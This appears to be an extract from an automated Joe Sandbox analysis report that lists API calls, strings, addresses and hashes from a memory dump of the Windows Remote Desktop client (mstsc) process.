                                                                                                                                                                                        • GetLastError.KERNEL32(008E396B,00000000,00000000,00000000), ref: 00927263
                                                                                                                                                                                        • CertFreeCertificateContext.CRYPT32(00000000,008E396B,00000000,00000000,insufficient number of signature verification parameters), ref: 00927392
                                                                                                                                                                                        • CertFreeCertificateChain.CRYPT32(?,008E396B,00000000,00000000,insufficient number of signature verification parameters), ref: 0092739D
                                                                                                                                                                                        • CertCloseStore.CRYPT32(?,00000000), ref: 009273AE
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E0EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,008DB78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0093A020,00000000,0093A020), ref: 008E0F32
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • VerifySignature failed, xrefs: 00927192
                                                                                                                                                                                        • insufficient number of signature verification parameters, xrefs: 00927360
                                                                                                                                                                                        • ValidateCertificate failed, xrefs: 009272C3
                                                                                                                                                                                        • SetCertificate failed, xrefs: 00927313
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CertErrorFreeLast$CertificateMessage$AddressChainCloseContextCryptDetachedHandleLibraryModuleProcSignatureStoreTraceVerify
                                                                                                                                                                                        • String ID: SetCertificate failed$ValidateCertificate failed$VerifySignature failed$insufficient number of signature verification parameters
                                                                                                                                                                                        • API String ID: 1801278590-3790569485
                                                                                                                                                                                        • Opcode ID: a6fd52a4f067f87a3495f0f1038843fd39d2e90de5bc0f91c265fc34ceffd578
                                                                                                                                                                                        • Instruction ID: d31f19e24df45780ef6a6ae989af298a2e0615e8170c6e9c05407ba4e83cdbce
                                                                                                                                                                                        • Opcode Fuzzy Hash: a6fd52a4f067f87a3495f0f1038843fd39d2e90de5bc0f91c265fc34ceffd578
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4261A331518351AFDB29DF95F849F2ABBAAFB45310F044459F880AB2A5C374DC44EBA2
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000044), ref: 0092CA60
                                                                                                                                                                                        • CreateWellKnownSid.ADVAPI32(00000016,00000000,00000000,?), ref: 0092CABA
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0092CAC4
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E2C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,008D7B50,0000000B,008E396B,00000004,00913BC2,00000004,00000000,?,00913BC2,008E396B,00000000,00000000,00000000), ref: 008E2C85
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0092CCC5
                                                                                                                                                                                        • RpcBindingFree.RPCRT4(00000000), ref: 0092CCD5
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Free$Local$AddressAllocBindingCreateErrorHandleKnownLastLibraryMessageModuleProcTraceWell
                                                                                                                                                                                        • String ID: CShadowRpcUtils::s_Bind failed$CShadowRpcUtils::s_BindSecure failed$SessEnvPrivateRpc$ncalrpc
                                                                                                                                                                                        • API String ID: 105258157-1822820735
                                                                                                                                                                                        • Opcode ID: 1ceaf29522f2970bb6f21386deb86b42aa9513a633f99a04ff9696eee54833cb
                                                                                                                                                                                        • Instruction ID: e84bbc41b75c7fa6206cb447e0cdfe2c9687a31f04ddb28c6ae8da4d6b229efd
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ceaf29522f2970bb6f21386deb86b42aa9513a633f99a04ff9696eee54833cb
                                                                                                                                                                                        • Instruction Fuzzy Hash: E98136B2900364AFDB29CF99E949F2E7BA9FB45310F11484AF984EB2A1C674CD40DF51
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetVersionExW.KERNEL32(?,?,00000000,0093A020), ref: 008F399C
                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 008F3A08
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E10B1: TraceMessage.ADVAPI32(00000000,008E396B,0000002B,008D7B50,0000000D,00913C39,00000004,00000000,?,00913C39,008E396B,00000000,00000000), ref: 008E10C8
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressFreeHandleInitializeLibraryMessageModuleProcTraceVersion
                                                                                                                                                                                        • String ID: (null)$Failed DisplayContents on Help Pane$Failed to call CoInitialize$Failed to cocreate CLSID_HxHelpPane$mstsc.chm
                                                                                                                                                                                        • API String ID: 1070927090-1823579970
                                                                                                                                                                                        • Opcode ID: 08e646aeacff3e189a2eec4c6a57ba796e4d29e7a3d9dfcd83cd04a5659b55ea
                                                                                                                                                                                        • Instruction ID: 098c288c7ac0c1db2d926778eb6117b82c06017f07213983d3de952ae9ff93a7
                                                                                                                                                                                        • Opcode Fuzzy Hash: 08e646aeacff3e189a2eec4c6a57ba796e4d29e7a3d9dfcd83cd04a5659b55ea
                                                                                                                                                                                        • Instruction Fuzzy Hash: F251B231605358AFCB298F25CC59FAA7BA5FB09320F144199FA45E72A1CB30CE81DF52
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00920C33
                                                                                                                                                                                        • IsWindow.USER32(?), ref: 00920C3E
                                                                                                                                                                                        • IsIconic.USER32(?), ref: 00920C4D
                                                                                                                                                                                        • GetSystemMetrics.USER32(00000000), ref: 00920C62
                                                                                                                                                                                        • GetSystemMetrics.USER32(00000001), ref: 00920C6A
                                                                                                                                                                                        • GetWindowRect.USER32(?,00000000), ref: 00920C74
                                                                                                                                                                                        • PtInRect.USER32(00000000), ref: 00920C8C
                                                                                                                                                                                        • PtInRect.USER32(00000000,?,-00000001), ref: 00920C9A
                                                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00920D03
                                                                                                                                                                                        • CopyRect.USER32(00000000,?), ref: 00920D4E
                                                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,?,00000000,00000000,00000015), ref: 00920E12
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Rect$Window$System$Metrics$CopyIconicInfoParameters
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3517074850-0
                                                                                                                                                                                        • Opcode ID: 9d766e37582d3af00eeecdbce85032319119ccef8a9b6dfd832281acb3d53f8d
                                                                                                                                                                                        • Instruction ID: e4a7f3e6a53e4ba5803b9cdf268a80c3c5db842f1b629d119751549f2bb4de05
                                                                                                                                                                                        • Opcode Fuzzy Hash: 9d766e37582d3af00eeecdbce85032319119ccef8a9b6dfd832281acb3d53f8d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B617D72900219AFCB14CFA9ED88FAEBBB9FB88304F054555E900B7166CB31EC458F61
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • IsIconic.USER32(?), ref: 008E8904
                                                                                                                                                                                        • GetWindowPlacement.USER32(?,?), ref: 008E8915
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 008E891F
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E2C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,008D7B50,0000000B,008E396B,00000004,00913BC2,00000004,00000000,?,00913BC2,008E396B,00000000,00000000,00000000), ref: 008E2C85
                                                                                                                                                                                        • IsZoomed.USER32(?), ref: 008E8A26
                                                                                                                                                                                        • SetWindowPlacement.USER32 ref: 008E8A6A
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 008E8A74
                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000216), ref: 008E8AE3
                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,00000000,00000000,00000000,00000205), ref: 008E8BC4
                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 008E8C49
                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 008E8C77
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Window$ErrorLastPlacement$AddressClientFreeHandleIconicLibraryMessageModuleMoveProcRectTraceZoomed
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1784869082-0
                                                                                                                                                                                        • Opcode ID: e2b7ad149795967963ca61ad42be8cd07cbd2fb5f7d711323950bbbf8b6e3500
                                                                                                                                                                                        • Instruction ID: 9447f05b7212ded10d8a6def00449209003c60eeb6a876798859e7772e06634f
                                                                                                                                                                                        • Opcode Fuzzy Hash: e2b7ad149795967963ca61ad42be8cd07cbd2fb5f7d711323950bbbf8b6e3500
                                                                                                                                                                                        • Instruction Fuzzy Hash: C4C18F71A00388EFDB198F66C889F6E7BA6FB46314F244059E909EB1A6CB31DC41DF11
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(00000003), ref: 0091210F
                                                                                                                                                                                        • PathAppendW.SHLWAPI(?,?), ref: 0091214C
                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 009121A0
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E10B1: TraceMessage.ADVAPI32(00000000,008E396B,0000002B,008D7B50,0000000D,00913C39,00000004,00000000,?,00913C39,008E396B,00000000,00000000), ref: 008E10C8
                                                                                                                                                                                        • FindClose.KERNEL32(00000002,008E396B,00000000,00000000), ref: 00912436
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: FileFindPath$AddressAppendAttributesCloseFreeHandleLibraryMessageModuleNameProcTrace
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3301147593-0
                                                                                                                                                                                        • Opcode ID: 89e5703b4bad92c1df715a0da6e16b0f28ab0ee678970d5fa3cc772c4dacbb97
                                                                                                                                                                                        • Instruction ID: aa52a5bde67c26a6d158eb61f94b9043466d6a1bf22ce3c71ec4cad02df4530d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 89e5703b4bad92c1df715a0da6e16b0f28ab0ee678970d5fa3cc772c4dacbb97
                                                                                                                                                                                        • Instruction Fuzzy Hash: C191EF7170421C9BCB29EF64CC88BEA37AAFB15304F580495E965972A2D731DEE1CF11
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CryptMsgOpenToDecode.CRYPT32(00010001,00000004,00000000,00000000,00000000,00000000), ref: 009279CF
                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00927284,?,?), ref: 009279F9
                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00927284,?,?), ref: 00927A28
                                                                                                                                                                                        • CryptMsgUpdate.CRYPT32(00000000,?,?,00000001), ref: 00927A35
                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00927284,?,?), ref: 00927A5D
                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00927284,?,?), ref: 00927A8C
                                                                                                                                                                                        • CertOpenStore.CRYPT32(00000001,00010001,00000000,00000000,00000000), ref: 00927A96
                                                                                                                                                                                        • CryptMsgClose.CRYPT32(00000000), ref: 00927A9F
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorLast$Crypt$Open$CertCloseDecodeStoreUpdate
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3172839031-0
                                                                                                                                                                                        • Opcode ID: 11d698128777757b64dca629193677e9fd1fea3208e4502de2cd029d1df79591
                                                                                                                                                                                        • Instruction ID: d9b90161bddd8a990ffff2f360ecce1ab9728679dbc8cc021837c83d37990653
                                                                                                                                                                                        • Opcode Fuzzy Hash: 11d698128777757b64dca629193677e9fd1fea3208e4502de2cd029d1df79591
                                                                                                                                                                                        • Instruction Fuzzy Hash: BD212372118361AEDB295BA9AC89F6B7B9DEB453B0F100044F940E6262CA74CD40DF61
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: EnableItemMenu$IconicZoomed
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1707219219-0
                                                                                                                                                                                        • Opcode ID: 2df53ff91f11811292d6d4e5a934ac17b3a26e28169470343c60e7e6ccc18638
                                                                                                                                                                                        • Instruction ID: 52f956c53c8f762957e5376e190ad8bb99b3ce2012322a683e0556656b82d85d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2df53ff91f11811292d6d4e5a934ac17b3a26e28169470343c60e7e6ccc18638
                                                                                                                                                                                        • Instruction Fuzzy Hash: DB21AE31610209FFDB258F62DC89FAA7BA9FF45B11F108169B505AA1A0C7B2BD00EB50
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CryptProtectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,0093391A), ref: 00933B93
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E0EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,008DB78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0093A020,00000000,0093A020), ref: 008E0F32
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,0093391A), ref: 00933C61
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Free$AddressCryptDataHandleLibraryLocalMessageModuleProcProtectTrace
                                                                                                                                                                                        • String ID: PBYTE$StringCbLength failed!
                                                                                                                                                                                        • API String ID: 4120179676-4256456346
                                                                                                                                                                                        • Opcode ID: 32d482a8b0b96d2593a765b83adb40b196361776cc3d64be51b2658f317d5fe3
                                                                                                                                                                                        • Instruction ID: 1eeb25d81bf9167f0c6bc1c96f6e00c097130fdfe3b0f428f06cb46b67dbd6f6
                                                                                                                                                                                        • Opcode Fuzzy Hash: 32d482a8b0b96d2593a765b83adb40b196361776cc3d64be51b2658f317d5fe3
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D411271A44349AFDB288F99D849B6A7BA9FB05310F148169F884F7261C774CE40DF81
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LoadLibraryW.KERNEL32(shell32.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00916433,?,00000001), ref: 00913B0D
                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetCurrentProcessExplicitAppUserModelID,?,?,?,?,?,?,?,?,?,00916433,?,00000001,?,00000000), ref: 00913B23
                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00916433,?,00000001,?,00000000,00000000), ref: 00913BFB
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008ED606: TraceMessage.ADVAPI32(00000000,00000000,0000002B,008D7B50,0000000A,008E396B,00000004,NULL,0000000A,00000000,?,00000000,00000000,0000000A,?,00913B87), ref: 008ED673
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • SetCurrentProcessExplicitAppUserModelID, xrefs: 00913B1D
                                                                                                                                                                                        • Microsoft.Windows.RemoteDesktop, xrefs: 00913AF9
                                                                                                                                                                                        • shell32.dll, xrefs: 00913B03
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Library$AddressFreeProc$HandleLoadMessageModuleTrace
                                                                                                                                                                                        • String ID: Microsoft.Windows.RemoteDesktop$SetCurrentProcessExplicitAppUserModelID$shell32.dll
                                                                                                                                                                                        • API String ID: 2109255295-1123326357
                                                                                                                                                                                        • Opcode ID: 664299f4b0a7fc34f1369e31ada56df1f76ddd609c5278937dea5f2b0b22efbd
                                                                                                                                                                                        • Instruction ID: e97f24803a005b6170d21c97b6d80d8dab830579069283a33695a573a82ee798
                                                                                                                                                                                        • Opcode Fuzzy Hash: 664299f4b0a7fc34f1369e31ada56df1f76ddd609c5278937dea5f2b0b22efbd
                                                                                                                                                                                        • Instruction Fuzzy Hash: BB413B317483886FE72C8F689949FA53BB9FB0A300F044049F941DB2A2D675CEC19F52
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • RpcStringBindingComposeW.RPCRT4(484809d6-4239-471b-b5bc-61df8c23ac48,ncacn_np,00000006,00000006,Security=Impersonation Dynamic False,?), ref: 009304A5
                                                                                                                                                                                        • RpcBindingFromStringBindingW.RPCRT4(?,?), ref: 00930505
                                                                                                                                                                                        • RpcStringFreeW.RPCRT4(00000000,?,00930651,00000006,\pipe\SessEnvPublicRpc,?,?,00000000,?,00000000,?,?,?,009305C2,?,?), ref: 00930573
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: BindingString$ComposeFreeFrom
                                                                                                                                                                                        • String ID: 484809d6-4239-471b-b5bc-61df8c23ac48$Security=Impersonation Dynamic False$ncacn_np
                                                                                                                                                                                        • API String ID: 465755213-2085260422
                                                                                                                                                                                        • Opcode ID: 18a099cc9b3eba8ea6a9bbb6ea1e74d7647a0c4a8400737799b5042436fc79db
                                                                                                                                                                                        • Instruction ID: 1c370cb0ea9620d46b274a2724eb816d39a514d36a4390672d60c817bd68e7bb
                                                                                                                                                                                        • Opcode Fuzzy Hash: 18a099cc9b3eba8ea6a9bbb6ea1e74d7647a0c4a8400737799b5042436fc79db
                                                                                                                                                                                        • Instruction Fuzzy Hash: 34312072600308AFDB2ACF5A9D88F267BAAFBC5320F250049F94187262D635CD04EF11
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,00000000,00000000,00003AB3), ref: 008E28CF
                                                                                                                                                                                        • FindResourceExW.KERNEL32(00000000,?,?,00000000), ref: 008E28EC
                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 008E2999
                                                                                                                                                                                          • Part of subcall function 008E142A: GetLastError.KERNEL32(008E0B13), ref: 008E142A
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Library$ErrorFindFreeLastLoadResource
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3418355812-0
                                                                                                                                                                                        • Opcode ID: 8fd005a23ce0504f52bdf737cc8a8c8f558547cc8e5dd27bc4eb7a8c1881212c
                                                                                                                                                                                        • Instruction ID: 1ce34ba933362a96e1fdcc05352af252ee10d8bd5a317e24813b1e27df97869f
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8fd005a23ce0504f52bdf737cc8a8c8f558547cc8e5dd27bc4eb7a8c1881212c
                                                                                                                                                                                        • Instruction Fuzzy Hash: F13185B190426D9BDB20AB568C44FEE7BB8FF46314F0084B9E519E7241DB708D819B55
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CryptBinaryToStringW.CRYPT32(?,?,00000001,00000000,?), ref: 0091D40E
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 0091D46B
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E2C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,008D7B50,0000000B,008E396B,00000004,00913BC2,00000004,00000000,?,00913BC2,008E396B,00000000,00000000,00000000), ref: 008E2C85
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressAllocBinaryCryptFreeHandleLibraryLocalMessageModuleProcStringTrace
                                                                                                                                                                                        • String ID: szEncoded
                                                                                                                                                                                        • API String ID: 73248781-2519130501
                                                                                                                                                                                        • Opcode ID: b612dea16ba4052504b1889604816b4cd303282c30421bbdaaf47bcb49c35f77
                                                                                                                                                                                        • Instruction ID: 6fb32a44dc49105d329883c5fe743c5cf9be7b2abf626c9d50d5b7ba61376a53
                                                                                                                                                                                        • Opcode Fuzzy Hash: b612dea16ba4052504b1889604816b4cd303282c30421bbdaaf47bcb49c35f77
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0041C071315308AFDB2A8F18DC89FAA3BAAFB85314F004559F945DB2A1CB74DC80DB56
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • wcschr.MSVCRT ref: 0092B0D2
                                                                                                                                                                                        • GetComputerNameW.KERNEL32(?,00000010), ref: 0092B12F
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0092B157
                                                                                                                                                                                        • GetLastError.KERNEL32(008E396B,00000000,00000000,00000000), ref: 0092B17A
                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 0092B19E
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008ED606: TraceMessage.ADVAPI32(00000000,00000000,0000002B,008D7B50,0000000A,008E396B,00000004,NULL,0000000A,00000000,?,00000000,00000000,0000000A,?,00913B87), ref: 008ED673
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
